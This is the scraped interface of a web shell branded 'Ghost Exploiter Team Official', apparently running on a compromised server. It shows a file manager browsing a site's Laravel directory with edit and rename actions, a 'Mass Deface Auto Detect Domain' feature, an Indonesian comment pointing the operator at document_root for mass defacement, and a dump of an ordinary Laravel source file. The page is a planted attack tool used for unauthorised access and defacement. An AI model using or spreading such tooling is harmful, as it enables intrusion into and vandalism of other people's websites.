webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
laravel
/
framework
/
src
/
Illuminate
/
Http
/
Resources
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
Json
--
ren
CollectsResources.php
2.5KB
edt
ren
ConditionallyLoadsAttri
...
11.473KB
edt
ren
DelegatesToResource.php
3.288KB
edt
ren
MergeValue.php
0.659KB
edt
ren
MissingValue.php
0.263KB
edt
ren
PotentiallyMissing.php
0.212KB
edt
ren
<?php namespace Illuminate\Http\Resources; use Illuminate\Support\Collection; use JsonSerializable; class MergeValue { /** * The data to be merged. * * @var array */ public $data; /** * Create a new merge value instance. * * @param \Illuminate\Support\Collection|\JsonSerializable|array $data * @return void */ public function __construct($data) { if ($data instanceof Collection) { $this->data = $data->all(); } elseif ($data instanceof JsonSerializable) { $this->data = $data->jsonSerialize(); } else { $this->data = $data; } } }
<=Back
Liking